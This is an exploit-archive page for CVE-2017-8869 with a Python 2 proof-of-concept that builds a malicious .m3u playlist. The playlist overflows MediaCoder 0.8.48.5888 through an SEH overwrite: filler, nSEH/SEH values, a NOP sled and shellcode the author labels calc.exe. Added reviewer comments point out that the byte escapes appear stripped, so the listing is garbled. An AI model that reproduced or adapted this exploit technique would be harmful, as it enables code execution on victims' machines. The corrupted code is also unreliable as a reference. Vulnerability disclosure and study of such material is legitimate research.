MediaCoder 0.8.48.5888 Local Buffer Overflow
Posted on 01 August 2017
#!/usr/bin/python
# Exploit Title       : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
# CVE                 : CVE-2017-8869
# Exploit Author      : Muhann4d @0xSecured
# Vendor Homepage     : http://www.mediacoderhq.com
# Vulnerable Software : http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
# Vulnerable Version  : 0.8.48.5888
# Fixed version       : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe
# Category            : Local Buffer Overflow
# Tested on OS        : Windows 7 Pro SP1 32bit
# How to              : Open MediaCoder then drag & drop the .m3u file in it and then press the START button.
#                       or just right-click on the .m3u file .. open with .. MediaCoder
# Timeline            :
# 2017-05-05: Vulnerability discovered, vendor has been contacted
# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version"
# 2017-05-09: A POC sent to the vendor.
# 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/
# 2017-06-26: Exploit released.
# Proof-of-concept generator for the MediaCoder 0.8.48.5888 playlist overflow
# (CVE-2017-8869, per the page header). It writes one file, "Exploit.m3u",
# holding a single over-long "http://" entry with no line break.
#
# Reading notes for analysts:
#   * Python 2 only: uses the `print` statement and raw_input().
#   * The header names 0.8.49.5890 as the fixed version; upgrading is the
#     remediation the page itself documents.
#   * The artefact is a playlist whose only entry is an "http://" string padded
#     to 2960 characters, which is far longer than a normal playlist URL. That
#     length and the missing newline are the observable traits of the file.
#   * NOTE(review): the string literals are reproduced exactly as this page
#     shows them. They are plain text such as "x41", not byte escapes, so the
#     lengths computed below count page characters. The listing does not look
#     like a faithful copy of the original script; confirm against the advisory.

# Banner printed on start-up.
print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured"
from struct import pack

# URL-style prefix followed by 361 repetitions of the filler literal.
junk = "http://" + "x41" * 361

# Two 4-byte little-endian values ('<I') appended directly after the filler.
# The names and the "(SEH)" tag in the title suggest they are meant to land on
# a structured-exception-handler record; the target layout is not shown here.
nseh = pack('<I',0x909006eb)
seh = pack('<I',0x66017187)

# Twenty repetitions of the "x90" literal placed ahead of the payload.
nops= "x90" * 20

#calc.exe
# The label above is the author's own. The blob is opaque on this page and was
# not decoded or verified here; treat it as untrusted data.
shell=("xbexb6x06x32x7axdaxd1xd9x74x24xf4x5ax29xc9xb1"
"x31x31x72x13x03x72x13x83xeax4axe4xc7x86x5ax6b"
"x27x77x9ax0cxa1x92xabx0cxd5xd7x9bxbcx9dxbax17"
"x36xf3x2exacx3axdcx41x05xf0x3ax6fx96xa9x7fxee"
"x14xb0x53xd0x25x7bxa6x11x62x66x4bx43x3bxecxfe"
"x74x48xb8xc2xffx02x2cx43xe3xd2x4fx62xb2x69x16"
"xa4x34xbex22xedx2exa3x0fxa7xc5x17xfbx36x0cx66"
"x04x94x71x47xf7xe4xb6x6fxe8x92xcex8cx95xa4x14"
"xefx41x20x8fx57x01x92x6bx66xc6x45xffx64xa3x02"
"xa7x68x32xc6xd3x94xbfxe9x33x1dxfbxcdx97x46x5f"
"x6fx81x22x0ex90xd1x8dxefx34x99x23xfbx44xc0x29"
"xfaxdbx7ex1fxfcxe3x80x0fx95xd2x0bxc0xe2xeaxd9"
"xa5x13x1axd0x33x83x85x81x7exc9x35x7cxbcxf4xb5"
"x75x3cx03xa5xffx39x4fx61x13x33xc0x04x13xe0xe1"
"x0cx70x67x72xccx59x02xf2x77xa6")

# Trailing "D" padding so the whole string comes to 2960 characters. If the
# earlier parts already exceeded 2960, the count would be negative and the
# padding would be empty.
junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell)))

# Final file content, in order: filler, the two packed values, the "x90" run,
# the payload blob, then padding.
exploit = junk + nseh + seh + nops + shell + junkD

try:
    # Text-mode write into the current working directory. `file` shadows the
    # Python 2 builtin of the same name. The handle is closed only on the
    # success path, because no `with` or `finally` is used.
    file= open("Exploit.m3u",'w')
    file.write(exploit)
    file.close()
    # Blocks until the user presses Enter, so the message stays visible.
    raw_input(" Exploit has been created! ")
except:
    # Bare except: any failure, including one raised by raw_input(), is
    # reported with this generic message and the cause is discarded.
    print "There has been an Error"